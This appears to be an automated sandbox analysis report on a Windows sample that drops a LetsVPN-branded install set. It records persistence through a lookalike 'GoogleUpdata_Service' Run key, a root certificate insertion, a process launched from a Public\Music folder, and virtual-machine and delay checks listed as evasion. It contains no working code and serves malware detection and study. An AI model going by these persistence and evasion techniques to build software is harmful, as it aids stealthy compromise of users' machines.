                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Runtime.InteropServices.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\SharpCompress.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Security.Principal.Windows.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.ServiceModel.Syndication.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\Microsoft.AppCenter.Analytics.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\Squirrel.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.ComponentModel.Annotations.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\ja\System.Web.Services.Description.resources.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\tr\System.Web.Services.Description.resources.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Globalization.Extensions.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.IO.MemoryMappedFiles.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Linq.Expressions.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Runtime.Serialization.Formatters.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Users\user\AppData\Local\Temp\nsj49F4.tmp\nsDialogs.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.AppContext.dllJump to dropped file
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeFile created: C:\Users\user\AppData\Local\Temp\{8bbf3398-85b1-894f-af03-707e5cd577b1}\SETE887.tmpJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Users\user\AppData\Local\Temp\nsj49F4.tmp\nsExec.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\driver\tap0901.sysJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Text.Encoding.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Collections.Specialized.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Net.NetworkInformation.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsVPNInfraStructure.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\MdXaml.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Security.Cryptography.Xml.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Memory.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Runtime.Serialization.Json.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Reflection.Primitives.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Management.Automation.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Security.Cryptography.Primitives.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Reflection.Extensions.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\WebSocket4Net.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\SQLite-net.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\ToastNotifications.Messages.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Resources.ResourceManager.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Users\user\AppData\Local\Temp\nsj49F4.tmp\nsProcess.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Security.Cryptography.ProtectedData.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Threading.AccessControl.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\Newtonsoft.Json.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\Microsoft.Web.WebView2.Core.dllJump to dropped file
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeFile created: C:\Users\user\AppData\Local\Temp\{8bbf3398-85b1-894f-af03-707e5cd577b1}\tap0901.sys (copy)Jump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Collections.NonGeneric.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Net.WebSockets.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Xml.ReaderWriter.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.IO.UnmanagedMemoryStream.dllJump to dropped file
                Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\DriverStore\Temp\{e1a4fd9a-c078-804d-adb0-e99915b985de}\SETEB17.tmpJump to dropped file
                Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\DriverStore\Temp\{e1a4fd9a-c078-804d-adb0-e99915b985de}\tap0901.sys (copy)Jump to dropped file
                Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\drivers\SETF101.tmpJump to dropped file
                Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\drivers\tap0901.sys (copy)Jump to dropped file

                Boot Survival

                Source: C:\Windows\System32\reg.exe; Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run GoogleUpdata_Service
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exe; Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LetsPRO
                Source: C:\Windows\System32\drvinst.exe; Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\tap0901
                Source: C:\Windows\System32\svchost.exe; Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Linkage
                Source: C:\Users\Public\Videos\bin.exe; File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\letsvpn
                Source: C:\Users\Public\Videos\bin.exe; File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\letsvpn\LetsVPN.lnk
                Source: C:\Users\Public\Videos\bin.exe; File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\letsvpn\Uninstall.lnk

                Hooking and other Techniques for Hiding and Protection

                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exe | Code function: 9_2_6CF0661E IsIconic,9_2_6CF0661E
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\8094640EB5A7A1CA119C1FDDD59F810263A7FBD1 Blob
                Source: C:\Users\user\Desktop\OneDriveSetup.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\svchost.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Videos\bin.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Windows Defender\MpCmdRun.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID="Disk #0, Partition #1"} where resultclass = Win32_DiskDrive
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDriveToDiskPartition where Dependent="Win32_DiskPartition.DeviceID=\"Disk #0, Partition #1\""
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_NetworkAdapter where ServiceName="tap0901"
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_NetworkAdapter where GUID="{508118AE-7AB1-45A3-BF63-B6BD771A1493}"
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select MACAddress From Win32_NetworkAdapter WHERE ((MACAddress Is Not NULL) AND (Manufacturer <> 'Microsoft'))
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::PutInstance - root\cimv2 : Win32_NetworkAdapter.DeviceID="10"
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_NetworkAdapterConfiguration where SettingID="{508118AE-7AB1-45A3-BF63-B6BD771A1493}"
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_NetworkAdapterConfiguration.Index=10::EnableStatic
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_networkadapterconfiguration where ServiceName = 'tap0901'
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk where DeviceId = 'C:'
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\ROOT\cimv2:Win32_LogicalDisk.DeviceID="C:"} where resultclass = Win32_DiskPartition
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Dependent="Win32_LogicalDisk.DeviceID=\"C:\""
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeMemory allocated: 16D0000 memory reserve | memory write watch
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeMemory allocated: 33B0000 memory reserve | memory write watch
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeMemory allocated: 53B0000 memory reserve | memory write watch
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeMemory allocated: 1480000 memory reserve | memory write watch
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeMemory allocated: 2F10000 memory reserve | memory write watch
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeMemory allocated: 4F10000 memory reserve | memory write watch
                Source: C:\Windows\System32\svchost.exeFile opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: GetProcessHeap,HeapAlloc,HeapAlloc,GetAdaptersInfo,GetProcessHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,MultiByteToWideChar,MultiByteToWideChar,StrStrIA,StrStrIA,GetProcessHeap,HeapFree,RegCloseKey,RegEnumKeyExW,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,RegCloseKey,9_2_006678A6
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: GetAdaptersInfo,GetAdaptersInfo,9_2_006677AC
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeThread delayed: delay time: 922337203685477
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeThread delayed: delay time: 220145
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeThread delayed: delay time: 300000
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3694
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2176
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8260
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1542
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWindow / User API: threadDelayed 4470
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWindow / User API: threadDelayed 1170
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWindow / User API: threadDelayed 2893
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Security.Cryptography.Cng.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Diagnostics.Tracing.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\Microsoft.Win32.SystemEvents.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\ndp462-web.exe
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Xml.XDocument.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Globalization.Calendars.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Linq.Parallel.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Security.Cryptography.Pkcs.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Runtime.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Security.Cryptography.Algorithms.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Security.Claims.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Web.Services.Description.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Threading.Thread.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Net.WebHeaderCollection.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\Microsoft.Expression.Interactions.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\Mono.Cecil.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Net.Http.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Diagnostics.TextWriterTraceListener.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Net.WebSockets.Client.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.ComponentModel.EventBasedAsync.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\FontAwesome.WPF.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Windows.Interactivity.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Data.OleDb.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\Microsoft.Web.WebView2.WinForms.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\SVGImage.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.ServiceModel.Http.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\Mono.Cecil.Rocks.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Collections.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\runtimes\win-x64\native\e_sqlite3.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\Microsoft.Win32.Registry.AccessControl.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.IO.Packaging.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\Mono.Cecil.Mdb.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.ServiceProcess.ServiceController.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Diagnostics.FileVersionInfo.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.IO.FileSystem.Watcher.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsj49F4.tmp\System.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\Mono.Cecil.Pdb.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\Update.exe
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\SuperSocket.ClientEngine.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Collections.Concurrent.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Net.IPNetwork.dll
                Source: C:\Windows\System32\drvinst.exeDropped PE file which has not been started: C:\Windows\System32\DriverStore\Temp\{e1a4fd9a-c078-804d-adb0-e99915b985de}\tap0901.sys (copy)
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Net.Security.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.ServiceModel.Security.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\PusherClient.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\SQLiteNetExtensionsAsync.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Globalization.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\WpfAnimatedGif.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Net.Requests.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.IO.FileSystem.AccessControl.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.ValueTuple.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Threading.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.ServiceModel.NetTcp.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.IO.IsolatedStorage.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Drawing.Common.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Diagnostics.TraceSource.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Runtime.Serialization.Xml.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\ToastNotifications.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Xml.XPath.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Net.NameResolution.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\libwin.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\SQLitePCLRaw.core.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Console.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Linq.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Text.Encoding.Extensions.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.IO.FileSystem.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\log4net.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Threading.Overlapped.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Resources.Writer.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Diagnostics.Contracts.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Diagnostics.Tools.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Buffers.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Resources.Reader.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Runtime.Numerics.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Xml.XmlSerializer.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Configuration.ConfigurationManager.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Threading.Tasks.Extensions.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Runtime.CompilerServices.VisualC.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\ICSharpCode.AvalonEdit.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\uninst.exe
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\SQLitePCLRaw.batteries_v2.dll
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Linq.Queryable.dll
